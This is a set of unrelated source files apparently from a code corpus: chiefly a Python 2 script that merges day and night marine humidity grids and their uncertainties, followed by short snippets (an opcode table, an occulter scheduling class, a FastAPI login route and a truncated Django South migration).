python2.7 merge_day_night.py --suffix relax --clims --months --start_year YYYY --end_year YYYY --start_month MM --end_month MM (OPTIONAL: one of --doQC1it, --doQC2it, --doQC3it, --doBCtotal, --doBCinstr, --doBChgt, --doNOWHOLE, plus --ShipOnly)
Run for uncertainty (with BCtotal and ShipOnly)
python2.7 merge_day_night.py --suffix relax --months --start_year YYYY --end_year YYYY --start_month MM --end_month MM --doBCtotal --doUSCN --ShipOnly
(--doUHGT, --doUR, --doUC, --doUM, --doUTOT, --doUSLR)
python2.7 gridding_cam.py --help
will show all options
--clims - run for the climatologies
--months - run for the monthly files (will need years and months)
-----------------------
OUTPUT
-----------------------
/project/hadobs2/hadisdh/marine/ICOADS.3.0.0/GRIDSOBSclim2noQC/
/project/hadobs2/hadisdh/marine/ICOADS.3.0.0/GRIDSERAclimNBC/
/project/hadobs2/hadisdh/marine/ICOADS.3.0.0/GRIDSOBSclim1NBC/
/project/hadobs2/hadisdh/marine/ICOADS.3.0.0/GRIDSOBSclim2NBC/
/project/hadobs2/hadisdh/marine/ICOADS.3.0.0/GRIDSOBSclim2BCtotal/
/project/hadobs2/hadisdh/marine/ICOADS.3.0.0/GRIDSOBSclim2BChgt/
/project/hadobs2/hadisdh/marine/ICOADS.3.0.0/GRIDSOBSclim2BCinstr/
/project/hadobs2/hadisdh/marine/ICOADS.3.0.0/GRIDSOBSclim2BCtotalship/
/project/hadobs2/hadisdh/marine/ICOADS.3.0.0/GRIDSOBSclim2BCtotalshipNOWHOLE/
-----------------------
VERSION/RELEASE NOTES
-----------------------
Version 4 (11 May 2020) <NAME>
---------
Enhancements
This now works with --doNOWHOLE which runs a BCtotal version with all of the rounding flagged data removed (run with --ShipOnly)
Changes
Bug fixes
Version 3 (9 Oct 2018) <NAME>
---------
Enhancements
This now works with the uncertainty fields which are only present for --doBCtotal --ShipOnly
Changes
Bug fixes
Version 2 (26 Sep 2016) <NAME>
---------
Enhancements
This can now work with the iterative approach which requires doQCit1, doQCit2 and doQCit3 to set the correct filepaths
It can also work with bias corrected grids which requires --doBCtotal, --doBChgt or --doBCscn
It can also work with --ShipOnly
Look for:
# KATE modified
...
# end
Changes
This hard wires the MEAN in places where I think that is sensible, despite settings.doMedian being set to True.
Look for # KATE MEDIAN WATCH
ACTUALLY - A TEST OF np.mean AND np.median ON A 2-ELEMENT ARRAY GIVES THE SAME ANSWER!!!!
Bug fixes
set_up_merge had issues with start_year = START_YEAR. I commented out the four time elements as these are all defined in the call
to function and do not need to be redefined here
The output latitudes were one box too high (92.5 to -82.5) so I switched the + for a - to solve this
Version 1 (release date)
---------
Enhancements
Changes
Bug fixes
-----------------------
OTHER INFORMATION
-----------------------
'''
import os
import datetime as dt
import numpy as np
import sys
import argparse
import matplotlib
matplotlib.use('Agg')
import calendar
import netCDF4 as ncdf
import pdb
import utils
import set_paths_and_vars
defaults = set_paths_and_vars.set()
#************************************************************************
def do_merge(fileroot, mdi, suffix = "relax", clims = False, doMedian = False, TimeFreq = 'M',
# UNC NEW
doUSLR = False, doUSCN = False, doUHGT = False, doUR = False, doUM = False, doUC = False, doUTOT = False):
'''
Merge the _day and _night files
Do a np.ma.mean or median for the data and a sum for the n_obs and n_grids
Output with a _both suffix
:param str fileroot: root for filenames
:param flt mdi: missing data indicator
:param str suffix: "relax" or "strict" criteria
:param bool clims: if climatologies then don't try and process anomalies.
:param bool doMedian: switch to enforce use of median over means
:param str TimeFreq: note to say which time resolution we're working with to write out - default M = monthly
# UNC NEW
:param bool doUSLR: do solar adjustment uncertainties
:param bool doUSCN: do instrument adjustment uncertainties
:param bool doUHGT: do height adjustment uncertainties
:param bool doUR: do rounding uncertainties
:param bool doUM: do measurement uncertainties
:param bool doUC: do climatology uncertainties
:param bool doUTOT: do total uncertainties
'''
# UNC NEW
# If an uncertainty run is set then set uSource to the name of the uncertainty
if doUSLR:
uSource = 'uSLR'
elif doUSCN:
uSource = 'uSCN'
elif doUHGT:
uSource = 'uHGT'
elif doUR:
uSource = 'uR'
elif doUM:
uSource = 'uM'
elif doUC:
uSource = 'uC'
elif doUTOT:
uSource = 'uTOT'
OBS_ORDER = utils.make_MetVars(mdi, multiplier = False)
if clims:
# KW make OBS_ORDER only the actual variables - remove anomalies
NEWOBS_ORDER = []
for v, var in enumerate(OBS_ORDER):
if "anomalies" not in var.name:
NEWOBS_ORDER.append(var)
del OBS_ORDER
OBS_ORDER = np.copy(NEWOBS_ORDER)
del NEWOBS_ORDER
# spin through both periods
for p, period in enumerate(["day", "night"]):
print period
# go through the variables
for v, var in enumerate(OBS_ORDER):
print " {}".format(var.name)
ncdf_file = ncdf.Dataset("{}_{}_{}.nc".format(fileroot, period, suffix),'r', format='NETCDF4')
if v == 0 and p == 0:
if doUSLR | doUSCN | doUHGT | doUR | doUM | doUC | doUTOT:
shape = list(ncdf_file.variables[var.name+"_"+uSource][:].shape)
else:
shape = list(ncdf_file.variables[var.name][:].shape)
shape.insert(0, len(OBS_ORDER)+2) # add all the variables
shape.insert(0, 2) # insert extra dimension to allow day + night
all_data = np.ma.zeros(shape)
if doUSLR | doUSCN | doUHGT | doUR | doUM | doUC | doUTOT:
all_data[p, v] = ncdf_file.variables[var.name+"_"+uSource][:]
else:
all_data[p, v] = ncdf_file.variables[var.name][:]
# get lats/lons of box centres
lat_centres = ncdf_file.variables["latitude"]
# KATE modified - this results in lats that go from 92.5 to -82,5 so I've switched the + for a -
latitudes = lat_centres - (lat_centres[1] - lat_centres[0])/2.
#latitudes = lat_centres + (lat_centres[1] - lat_centres[0])/2.
# end
lon_centres = ncdf_file.variables["longitude"]
longitudes = lon_centres + (lon_centres[1] - lon_centres[0])/2.
# get times - make a dummy object and then populate attributes
times = utils.TimeVar("time", "time since 1/{}/{} in hours".format(1, 1973), "hours", "time")
times.long_name = ncdf_file.variables["time"].long_name
times.standard_name = ncdf_file.variables["time"].standard_name
times.units = ncdf_file.variables["time"].units
times.data = ncdf_file.variables["time"][:]
else:
if doUSLR | doUSCN | doUHGT | doUR | doUM | doUC | doUTOT:
all_data[p, v] = ncdf_file.variables[var.name+"_"+uSource][:]
else:
all_data[p, v] = ncdf_file.variables[var.name][:]
# and get n_obs and n_grids
all_data[p, -2] = ncdf_file.variables["n_grids"][:]
all_data[p, -1] = ncdf_file.variables["n_obs"][:]
# invert latitudes
latitudes = latitudes[::-1]
all_data = all_data[:,:,:,::-1,:]
# got all the info, now merge
# If this is an uncertainty field then combine in quadrature with or without correlations
if doMedian: # THIS IS A BIG PILE OF RUBBISH FOR UNCERTAINTY SO DON'T DO IT
# UNC NEW
# Assumed correlating at r=1
if doUSLR | doUSCN | doUHGT | doUC:
merged_data = utils.bn_median(all_data[:, :len(OBS_ORDER)], axis = 0) / np.sqrt(np.ma.count(all_data[:, :len(OBS_ORDER)], axis = 0))
# Assumed no correlation r=0
elif doUR | doUM | doUTOT:
merged_data = utils.bn_median(all_data[:, :len(OBS_ORDER)], axis = 0) / np.sqrt(np.ma.count(all_data[:, :len(OBS_ORDER)], axis = 0))
else:
merged_data = utils.bn_median(all_data[:, :len(OBS_ORDER)], axis = 0)
else:
# Assumed correlating at r=1
if doUSLR | doUSCN | doUHGT | doUC:
# <NAME> thinks that this should be /N rather than /SQRT(N) which will make uncertainties smaller so I'm trying it
# merged_data = np.sqrt(np.ma.power(np.ma.sum(all_data[:, :len(OBS_ORDER)], axis = 0),2.)) / np.sqrt(np.ma.count(all_data[:, :len(OBS_ORDER)], axis = 0))
merged_data = np.sqrt(np.ma.power(np.ma.sum(all_data[:, :len(OBS_ORDER)], axis = 0),2.)) / np.ma.count(all_data[:, :len(OBS_ORDER)], axis = 0)
# print('Doing correlated mean combo:',merged_data)
# pdb.set_trace()
# Assumed no correlation r=0
elif doUR | doUM | doUTOT:
# <NAME> thinks that this should be /N rather than /SQRT(N) which will make uncertainties smaller so I'm trying it
# merged_data = np.sqrt(np.ma.sum(np.ma.power(all_data[:, :len(OBS_ORDER)],2.), axis = 0)) / np.sqrt(np.ma.count(all_data[:, :len(OBS_ORDER)], axis = 0))
merged_data = np.sqrt(np.ma.sum(np.ma.power(all_data[:, :len(OBS_ORDER)],2.), axis = 0)) / np.ma.count(all_data[:, :len(OBS_ORDER)], axis = 0)
# print('Doing uncorrelated mean combo:',merged_data)
# pdb.set_trace()
else:
merged_data = np.ma.mean(all_data[:, :len(OBS_ORDER)], axis = 0)
# print('Doing flat mean combo:',merged_data)
# pdb.set_trace()
# and process the grids and observations (split off here so have incorporated latitude inversion)
n_grids = np.ma.sum(all_data[:, -2], axis = 0)
n_obs = np.ma.sum(all_data[:, -1], axis = 0)
n_obs.fill_value = -1
n_grids.fill_value = -1
# write the output file
# UNC NEW
if doUSLR | doUSCN | doUHGT | doUR | doUM | doUC | doUTOT:
utils.netcdf_write_unc(uSource, "{}_{}_{}.nc".format(fileroot, "both", suffix), merged_data, n_grids, n_obs, OBS_ORDER, latitudes, longitudes, times, frequency = TimeFreq, \
doUSLR = doUSLR, doUSCN = doUSCN, doUHGT = doUHGT, doUR = doUR, doUM = doUM, doUC = doUC, doUTOT = doUTOT)
else:
utils.netcdf_write("{}_{}_{}.nc".format(fileroot, "both", suffix), merged_data, n_grids, n_obs, OBS_ORDER, latitudes, longitudes, times, frequency = TimeFreq)
# test distribution of obs with grid boxes
outfile = open("{}_{}_{}.txt".format(fileroot.split("/")[-1], "both", suffix), "w")
utils.boxes_with_n_obs(outfile, n_obs, merged_data[0], "")
return # do_merge
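# --- Hedged numeric illustration (added, not called anywhere) ---
# Shows the two uncertainty combinations used in do_merge when merging the
# N=2 (day, night) grids: fully correlated components (r=1) are summed
# linearly then divided by N; uncorrelated components (r=0) are summed in
# quadrature then divided by N. The function name is hypothetical.
def _combine_uncertainty_example(u_day=0.3, u_night=0.4):
    import numpy as np
    u_corr = abs(u_day + u_night) / 2.0               # r=1 -> 0.35
    u_uncorr = np.sqrt(u_day**2 + u_night**2) / 2.0   # r=0 -> 0.25
    return u_corr, u_uncorr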
#************************************************************************
def get_fileroot(settings, climatology = False, pentads = False, months = [], do3hr = True, time = [], daily = True, stdev = False,
# UNC NEW
doUSLR = False, doUSCN = False, doUHGT = False, doUR = False, doUM = False, doUC = False, doUTOT = False):
'''
Get the filename root depending on switches
:param Settings settings: settings object for paths
:param bool climatology: for pentad climatology files
:param bool pentads: for annual pentad files
:param list months: for monthly files
:param bool do3hr: run for pentad climatology files created from 3hrly data
:param list time: pass in [YYYY] or [YYYY, MM] for pentad or monthly files
:param bool daily: run for monthly grids created from 1x1 daily
:param bool stdev: run on the standard deviation files from climatology
# UNC NEW
:param bool doUSLR: run for solar uncertainties
:param bool doUSCN: run for instrument uncertainties
:param bool doUHGT: run for height uncertainties
:param bool doUR: run for rounding uncertainties
:param bool doUM: run for measurement uncertainties
:param bool doUC: run for climatology uncertainties
:param bool doUTOT: run for total uncertainties
'''
# UNC NEW
# If there is an uncertainty run set then set uSource to the name of hte uncertainty
if doUSLR:
uSource = 'uSLR'
elif doUSCN:
uSource = 'uSCN'
elif doUHGT:
uSource = 'uHGT'
elif doUR:
uSource = 'uR'
elif doUM:
uSource = 'uM'
elif doUC:
uSource = 'uC'
elif doUTOT:
uSource = 'uTOT'
if climatology and months != []:
print "Cannot run both for Climatology files and for Monthly files"
raise RuntimeError
if climatology:
if do3hr:
if stdev:
fileroot = settings.DATA_LOCATION + settings.OUTROOT + "_1x1_pentad_stdev_from_3hrly"
else:
fileroot = settings.DATA_LOCATION + settings.OUTROOT + "_1x1_pentad_climatology_from_3hrly"
else:
if stdev:
fileroot = settings.DATA_LOCATION + settings.OUTROOT + "_1x1_pentad_stdev"
else:
fileroot = settings.DATA_LOCATION + settings.OUTROOT + "_1x1_pentad_climatology"
elif pentads:
if do3hr:
fileroot = settings.DATA_LOCATION + settings.OUTROOT + "_1x1_pentad_from_3hrly_{}".format(time[0])
else:
fileroot = settings.DATA_LOCATION + settings.OUTROOT + "_1x1_pentad_{}".format(time[0])
elif months != []:
# UNC NEW
if doUSLR | doUSCN | doUHGT | doUR | doUM | doUC | doUTOT:
if daily:
fileroot = settings.DATA_LOCATION + settings.OUTROOT + "_{}_5x5_monthly_from_daily_{}{:02d}".format(uSource, time[0], time[1])
else:
fileroot = settings.DATA_LOCATION + settings.OUTROOT + "_{}_5x5_monthly_{}{:02d}".format(uSource, time[0], time[1])
else:
if daily:
fileroot = settings.DATA_LOCATION + settings.OUTROOT + "_5x5_monthly_from_daily_{}{:02d}".format(time[0], time[1])
else:
fileroot = settings.DATA_LOCATION + settings.OUTROOT + "_5x5_monthly_{}{:02d}".format(time[0], time[1])
return fileroot # get_fileroot
#************************************************************************
# KATE modified
def set_up_merge(suffix = "relax", clims = False, months = False, pentads = False, start_year = defaults.START_YEAR, end_year = defaults.END_YEAR, start_month = 1, end_month = 12,
doQC = False, doQC1it = False, doQC2it = False, doQC3it = False, doBC = False, doBCtotal = False, doBChgt = False, doBCscn = False, doNOWHOLE = False,
doUSLR = False, doUSCN = False, doUHGT = False, doUR = False, doUM = False, doUC = False, doUTOT = False, ShipOnly = False):
#def set_up_merge(suffix = "relax", clims = False, months = False, pentads = False, start_year = defaults.START_YEAR, end_year = defaults.END_YEAR, start_month = 1, end_month = 12, doQC = False, doBC = False):
# end
'''
Obtain file roots and set processes running
:param str suffix: "relax" or "strict" criteria
:param bool clims: run the climatologies
:param bool months: run the climatologies
:param bool pentads: run the annual pentads
:param int start_year: start year to process
:param int end_year: end year to process
:param int start_month: start month to process
:param int end_month: end month to process
:param bool doQC: incorporate the QC flags or not
# KATE modified
:param bool doQC1it: incorporate the QC flags or not
:param bool doQC2it: incorporate the QC flags or not
:param bool doQC3it: incorporate the QC flags or not
# end
# KATE modified
:param bool doBCtotal: work on the total bias corrected data
:param bool doBChgt: work on the height only bias corrected data
:param bool doBCscn: work on the screen only bias corrected data
# end
:param bool doNOWHOLE: work on the BCtotal data with no whole number flagged data
:param bool doBC: work on the bias corrected data
# UNC NEW
:param bool doUSLR: work on solar adjustment uncertainty
:param bool doUSCN: work on instrument adjustment uncertainty
:param bool doUHGT: work on height adjustment uncertainty
:param bool doUR: work on rounding uncertainty
:param bool doUM: work on measurement uncertainty
    :param bool doUC: work on climatology uncertainty
    :param bool doUTOT: work on the total combined uncertainty
# KATE modified
:param bool ShipOnly: work on the ship only data
# end
# KATE modified
NOTE THAT I HAVE OVERWRITTEN settings.doMedian to force MEAN instead
# end
'''
# KATE modified
settings = set_paths_and_vars.set(doBC = doBC, doBCtotal = doBCtotal, doBChgt = doBChgt, doBCscn = doBCscn, doNOWHOLE = doNOWHOLE, doQC = doQC, doQC1it = doQC1it, doQC2it = doQC2it, doQC3it = doQC3it, \
doUSLR = doUSLR, doUSCN = doUSCN, doUHGT = doUHGT, doUR = doUR, doUM = doUM, doUC = doUC, doUTOT = doUTOT, ShipOnly = ShipOnly)
#settings = set_paths_and_vars.set(doBC = doBC, doQC = doQC)
# end
if clims:
print "Processing Climatologies"
TimeFreq = 'C' # this is used when writing out netCDF file so needs to be passed to do_merge
# fileroot = get_fileroot(settings, climatology = True)
# do_merge(fileroot, settings.mdi, suffix, doMedian = settings.doMedian)
fileroot = get_fileroot(settings, climatology = True, do3hr = True)
# KATE MEDIAN WATCH
# KATE modified - forcing MEAN
do_merge(fileroot, settings.mdi, suffix, clims = True, doMedian = False, TimeFreq = TimeFreq)
#do_merge(fileroot, settings.mdi, suffix, clims = True, doMedian = settings.doMedian)
# end
# and stdev
print "Processing Standard Deviations"
fileroot = get_fileroot(settings, climatology = True, do3hr = True, stdev = True)
# KATE MEDIAN WATCH
# KATE modified - forcing MEAN
do_merge(fileroot, settings.mdi, suffix, clims = True, doMedian = False, TimeFreq = TimeFreq)
#do_merge(fileroot, settings.mdi, suffix, clims = True, doMedian = settings.doMedian)
# end
if pentads:
print "Processing Pentads"
TimeFreq = 'P' # this is used when writing out netCDF file so needs to be passed to do_merge
# fileroot = get_fileroot(settings, pentads = True)
# do_merge(fileroot, settings.mdi, suffix, doMedian = settings.doMedian)
for year in np.arange(start_year, end_year + 1):
print year
fileroot = get_fileroot(settings, pentads = True, do3hr = True, time = [year])
# KATE MEDIAN WATCH
# KATE modified - forcing MEAN
do_merge(fileroot, settings.mdi, suffix, doMedian = False, TimeFreq = TimeFreq)
#do_merge(fileroot, settings.mdi, suffix, doMedian = settings.doMedian)
# end
if months:
print "Processing Monthly Files"
TimeFreq = 'M' # this is used when writing out netCDF file so needs to be passed to do_merge
# KATE modified - START_YEAR not defined - commented these out as they are all set in the call to function
#start_year = START_YEAR
#end_year = END_YEAR
#start_month = 1
#end_month = 12
# end
for year in np.arange(start_year, end_year + 1):
print year
for month in np.arange(start_month, end_month + 1):
print " {}".format(month)
# fileroot = get_fileroot(settings, months = True, time = [year, month])
# do_merge(fileroot, settings.mdi, suffix, doMedian = settings.doMedian)
fileroot = get_fileroot(settings, months = True, time = [year, month], daily = True, \
# UNC NEW
doUSLR = doUSLR, doUSCN = doUSCN, doUHGT = doUHGT, doUR = doUR, doUM = doUM, doUC = doUC, doUTOT = doUTOT)
# KATE MEDIAN WATCH
# KATE modified - forcing MEAN
do_merge(fileroot, settings.mdi, suffix, doMedian = False, TimeFreq = TimeFreq, \
# UNC NEW
doUSLR = doUSLR, doUSCN = doUSCN, doUHGT = doUHGT, doUR = doUR, doUM = doUM, doUC = doUC, doUTOT = doUTOT)
#do_merge(fileroot, settings.mdi, suffix, doMedian = settings.doMedian)
# end
return # set_up_merge
#************************************************************************
if __name__=="__main__":
import argparse
# set up keyword arguments
parser = argparse.ArgumentParser()
parser.add_argument('--suffix', dest='suffix', action='store', default = "relax",
help='"relax" or "strict" completeness, default = relax')
parser.add_argument('--clims', dest='clims', action='store_true', default = False,
help='run climatology merge, default = False')
parser.add_argument('--months', dest='months', action='store_true', default = False,
help='run monthly merge, default = False')
parser.add_argument('--pentads', dest='pentads', action='store_true', default = False,
help='run pentad merge, default = False')
parser.add_argument('--start_year', dest='start_year', action='store', default = defaults.START_YEAR,
help='which year to start run, default = 1973')
parser.add_argument('--end_year', dest='end_year', action='store', default = defaults.END_YEAR,
help='which year to end run, default = present')
parser.add_argument('--start_month', dest='start_month', action='store', default = 1,
help='which month to start run, default = 1')
parser.add_argument('--end_month', dest='end_month', action='store', default = 12,
help='which month to end run, default = 12')
parser.add_argument('--doQC', dest='doQC', action='store_true', default = False,
help='process the QC information, default = False')
# KATE modified
parser.add_argument('--doQC1it', dest='doQC1it', action='store_true', default = False,
help='process the first iteration QC information, default = False')
parser.add_argument('--doQC2it', dest='doQC2it', action='store_true', default = False,
help='process the second iteration QC information, default = False')
parser.add_argument('--doQC3it', dest='doQC3it', action='store_true', default = False,
help='process the third iteration QC information, default = False')
# end
parser.add_argument('--doBC', dest='doBC', action='store_true', default = False,
help='process the bias corrected data, default = False')
# KATE modified
parser.add_argument('--doBCtotal', dest='doBCtotal', action='store_true', default = False,
help='process the bias corrected data, default = False')
parser.add_argument('--doBChgt', dest='doBChgt', action='store_true', default = False,
help='process the height only bias corrected data, default = False')
parser.add_argument('--doBCscn', dest='doBCscn', action='store_true', default = False,
help='process the height only bias corrected data, default = False')
# end
parser.add_argument('--doNOWHOLE', dest='doNOWHOLE', action='store_true', default = False,
help='process the bias corrected data with all whole number flagged data removed, default = False')
# UNC NEW - THESE MUST BE RUN WITH --doBCtotal and --ShipOnly
parser.add_argument('--doUSCN', dest='doUSCN', action='store_true', default = False,
help='process the bias corrected data uncertainties for instrument adjustment, default = False')
parser.add_argument('--doUHGT', dest='doUHGT', action='store_true', default = False,
help='process the bias corrected data uncertainties for height adjustment, default = False')
parser.add_argument('--doUR', dest='doUR', action='store_true', default = False,
help='process the bias corrected data uncertainties for rounding, default = False')
parser.add_argument('--doUM', dest='doUM', action='store_true', default = False,
help='process the bias corrected data uncertainties for measurement, default = False')
parser.add_argument('--doUC', dest='doUC', action='store_true', default = False,
help='process the bias corrected data uncertainties for climatology, default = False')
parser.add_argument('--doUTOT', dest='doUTOT', action='store_true', default = False,
help='process the bias corrected data uncertainties combined, default = False')
parser.add_argument('--doUSLR', dest='doUSLR', action='store_true', default = False,
help='process the bias corrected data uncertainties for solar radiation, default = False')
# KATE modified
parser.add_argument('--ShipOnly', dest='ShipOnly', action='store_true', default = False,
help='process the ship platform type only data, default = False')
# end
args = parser.parse_args()
# KATE modified
# UNC NEW
set_up_merge(suffix = str(args.suffix), clims = args.clims, months = args.months, pentads = args.pentads, \
start_year = int(args.start_year), end_year = int(args.end_year), \
start_month = int(args.start_month), end_month = int(args.end_month), \
doQC = args.doQC, doQC1it = args.doQC1it, doQC2it = args.doQC2it, doQC3it = args.doQC3it, \
doBC = args.doBC, doBCtotal = args.doBCtotal, doBChgt = args.doBChgt, doBCscn = args.doBCscn, doNOWHOLE = args.doNOWHOLE, \
doUSLR = args.doUSLR, doUSCN = args.doUSCN, doUHGT = args.doUHGT, doUR = args.doUR, doUM = args.doUM, doUC = args.doUC, doUTOT = args.doUTOT, \
ShipOnly = args.ShipOnly)
#set_up_merge(suffix = str(args.suffix), clims = args.clims, months = args.months, pentads = args.pentads, \
# start_year = int(args.start_year), end_year = int(args.end_year), \
# start_month = int(args.start_month), end_month = int(args.end_month), doQC = args.doQC, doBC = args.doBC)
# end
# END
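# Example invocations (illustrative only; the script filename below is
# hypothetical, but every flag exists in the argparse setup above):
#   python2 merge_grids.py --clims --doQC
#   python2 merge_grids.py --months --start_year 1973 --end_year 1974 --doBCtotal --ShipOnly
#   python2 merge_grids.py --months --doBCtotal --ShipOnly --doUTOT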
# ************************************************************************
|
StarcoderdataPython
|
186447
|
<filename>sponsor-challenges/csit/part1 source/opcode.py<gh_stars>1-10
class opcode(object):
nul = 1
hello = 2
rhello = 130
get = 160
rget = 161
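# Minimal illustrative use of the table above: compare a received command byte
# against the named constants rather than magic numbers.
# assert opcode.hello == 2 and opcode.rhello == 130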
|
StarcoderdataPython
|
4980105
|
from dependency_injector.wiring import inject, Provide
from fastapi import APIRouter, Depends
from application.rest_api.authentication.schemas import AuthenticateJwtResponse, LoginPostRequestBody
from application.users.container import UserContainer
from application.users.services import LoginUserService
router = APIRouter()
@router.post("/login", response_model=AuthenticateJwtResponse)
@inject
async def login(
login_post_request_body: LoginPostRequestBody,
login_user_service: LoginUserService = Depends(Provide[UserContainer.login_user_service]),
):
"""
    Controller for authenticating users.
    :param login_post_request_body: The POST request body with the user credentials.
    :param login_user_service: The login service that will authenticate the user.
:return: The encoded JWT response.
"""
return await login_user_service.apply(
        email=login_post_request_body.email, password=login_post_request_body.password
)
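# Illustrative request against this router (host and port are assumptions; the
# email and password fields match how LoginPostRequestBody is used above):
#   curl -X POST http://localhost:8000/login \
#        -H "Content-Type: application/json" \
#        -d '{"email": "user@example.com", "password": "secret"}'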
|
StarcoderdataPython
|
6431805
|
<reponame>semaphoreP/EXOSIMS
from EXOSIMS.SurveySimulation.linearJScheduler import linearJScheduler
import astropy.units as u
import numpy as np
class occulterJScheduler(linearJScheduler):
"""occulterJScheduler
This class inherits linearJScheduler and works best when paired with the
SotoStarshade Observatory class.
Args:
nSteps (integer 1x1):
Number of steps to take when calculating the cost function.
\*\*specs:
user specified values
"""
def __init__(self, nSteps=1, useAngles=False, **specs):
linearJScheduler.__init__(self, **specs)
if nSteps < 1:
raise TypeError("nSteps must be 1 or greater")
nSteps = int(nSteps)
self.nSteps = nSteps
self.useAngles = useAngles
def choose_next_target(self, old_sInd, sInds, slewTimes, intTimes):
"""Helper method for method next_target to simplify alternative implementations.
Given a subset of targets (pre-filtered by method next_target or some
other means), select the best next one. The prototype uses completeness
as the sole heuristic.
Args:
old_sInd (integer):
Index of the previous target star
sInds (integer array):
Indices of available targets
slewTimes (astropy quantity array):
slew times to all stars (must be indexed by sInds)
intTimes (astropy Quantity array):
Integration times for detection in units of day
Returns:
sInd (integer):
Index of next target star
waitTime (astropy Quantity):
some strategic amount of time to wait in case an occulter slew is desired (default is None)
"""
OS = self.OpticalSystem
Comp = self.Completeness
TL = self.TargetList
Obs = self.Observatory
TK = self.TimeKeeping
# cast sInds to array
sInds = np.array(sInds, ndmin=1, copy=False)
# calculate dt since previous observation
dt = TK.currentTimeAbs.copy() + slewTimes[sInds]
# get dynamic completeness values
comps = Comp.completeness_update(TL, sInds, self.starVisits[sInds], dt)
# if first target, or if only 1 available target,
# choose highest available completeness
nStars = len(sInds)
if (old_sInd is None) or (nStars == 1):
sInd = np.random.choice(sInds[comps == max(comps)])
return sInd, slewTimes[sInd]
else:
# define adjacency matrix
A = np.zeros(nStars)
# only consider slew distance when there's an occulter
if OS.haveOcculter:
angdists = Obs.star_angularSep(TL, old_sInd, sInds, dt)
try:
Obs.__getattribute__('dV_interp')
                except AttributeError:
self.useAngles = True
if self.useAngles:
A[np.ones((nStars), dtype=bool)] = angdists
A = self.coeffs[0]*(A)/np.pi
else:
dVs = np.array([Obs.dV_interp(slewTimes[sInds[s]],angdists[s].to('deg'))[0] for s in range(len(sInds))])
A[np.ones((nStars), dtype=bool)] = dVs
A = self.coeffs[0]*(A)/(0.025*Obs.dVtot.value)
# add factor due to completeness
A = A + self.coeffs[1]*(1 - comps)
# add factor due to unvisited ramp
f_uv = np.zeros(nStars)
unvisited = self.starVisits[sInds]==0
f_uv[unvisited] = float(TK.currentTimeNorm.copy()/TK.missionLife)**2
A = A - self.coeffs[2]*f_uv
# add factor due to revisited ramp
f2_uv = np.where(self.starVisits[sInds] > 0, 1, 0) *\
(1 - (np.in1d(sInds, self.starRevisit[:,0],invert=True)))
A = A + self.coeffs[3]*f2_uv
if self.nSteps > 1:
A_ = np.zeros((nStars,nStars))
# only consider slew distance when there's an occulter
if OS.haveOcculter:
angdists_ = np.array([Obs.star_angularSep(TL, s, sInds, dt) for s in range(len(sInds))])*u.d
dVs_= np.array([Obs.dV_interp(slewTimes[sInds[s]],angdists_[s,:]) for s in range(len(sInds))])
A_ = self.coeffs[0]*dVs_.reshape(nStars,nStars)/(0.025*Obs.dVtot.value)
# add factor due to completeness
A_ = A_ + self.coeffs[1]*(1 - comps)
# add factor due to unvisited ramp
f_uv = np.zeros(nStars)
unvisited = self.starVisits[sInds]==0
f_uv[unvisited] = float(TK.currentTimeNorm.copy()/TK.missionLife)**2
A_ = A_ - self.coeffs[2]*f_uv
# add factor due to revisited ramp
f2_uv = np.where(self.starVisits[sInds] > 0, 1, 0) *\
(1 - (np.in1d(sInds, self.starRevisit[:,0],invert=True)))
A_ = A_ + self.coeffs[3]*f2_uv
step1 = np.tile(A, (nStars, 1)).flatten('F')
stepN = A_.flatten()
tmp = np.argmin( step1 + stepN*(self.nSteps-1) )
sInd = sInds[int(np.floor(tmp/float(nStars)))]
else:
# take just one step
tmp = np.argmin(A)
sInd = sInds[int(tmp)]
return sInd, slewTimes[sInd] #if coronagraph or first sInd, waitTime will be 0 days
|
StarcoderdataPython
|
4928918
|
<reponame>ChuanleiGuo/AlgorithmsPlayground
class Solution(object):
def PredictTheWinner(self, nums):
"""
:type nums: List[int]
:rtype: bool
"""
mem = {}
def helper(i, j):
if (i, j) not in mem:
mem[(i, j)] = nums[i] if i == j else \
max(nums[i] - helper(i + 1, j), nums[j] - helper(i, j - 1))
return mem[(i, j)]
return helper(0, len(nums) - 1) >= 0
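# Worked examples (score differences verified by hand with the minimax
# recurrence above):
# >>> Solution().PredictTheWinner([1, 5, 2])
# False
# >>> Solution().PredictTheWinner([1, 5, 233, 7])
# True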
|
StarcoderdataPython
|
12815373
|
<gh_stars>1-10
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Nameserver'
db.create_table('nameserver', (
('created', self.gf('django.db.models.fields.DateTimeField')(auto_now_add=True, blank=True)),
('modified', self.gf('django.db.models.fields.DateTimeField')(auto_now=True, blank=True)),
('ttl', self.gf('django.db.models.fields.PositiveIntegerField')(default=3600, null=True, blank=True)),
('description', self.gf('django.db.models.fields.CharField')(max_length=1000, null=True, blank=True)),
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('domain', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['domain.Domain'])),
('server', self.gf('django.db.models.fields.CharField')(max_length=255)),
('addr_glue', self.gf('django.db.models.fields.related.ForeignKey')(blank=True, related_name='nameserver_set', null=True, to=orm['address_record.AddressRecord'])),
('intr_glue', self.gf('django.db.models.fields.related.ForeignKey')(blank=True, related_name='nameserver_set', null=True, to=orm['static_intr.StaticInterface'])),
))
db.send_create_signal('nameserver', ['Nameserver'])
# Adding unique constraint on 'Nameserver', fields ['domain', 'server']
db.create_unique('nameserver', ['domain_id', 'server'])
# Adding M2M table for field views on 'Nameserver'
db.create_table('nameserver_views', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('nameserver', models.ForeignKey(orm['nameserver.nameserver'], null=False)),
('view', models.ForeignKey(orm['view.view'], null=False))
))
db.create_unique('nameserver_views', ['nameserver_id', 'view_id'])
def backwards(self, orm):
# Removing unique constraint on 'Nameserver', fields ['domain', 'server']
db.delete_unique('nameserver', ['domain_id', 'server'])
# Deleting model 'Nameserver'
db.delete_table('nameserver')
# Removing M2M table for field views on 'Nameserver'
db.delete_table('nameserver_views')
models = {
'address_record.addressrecord': {
'Meta': {'unique_together': "(('label', 'domain', 'fqdn', 'ip_upper', 'ip_lower', 'ip_type'),)", 'object_name': 'AddressRecord', 'db_table': "'address_record'"},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.CharField', [], {'max_length': '1000', 'null': 'True', 'blank': 'True'}),
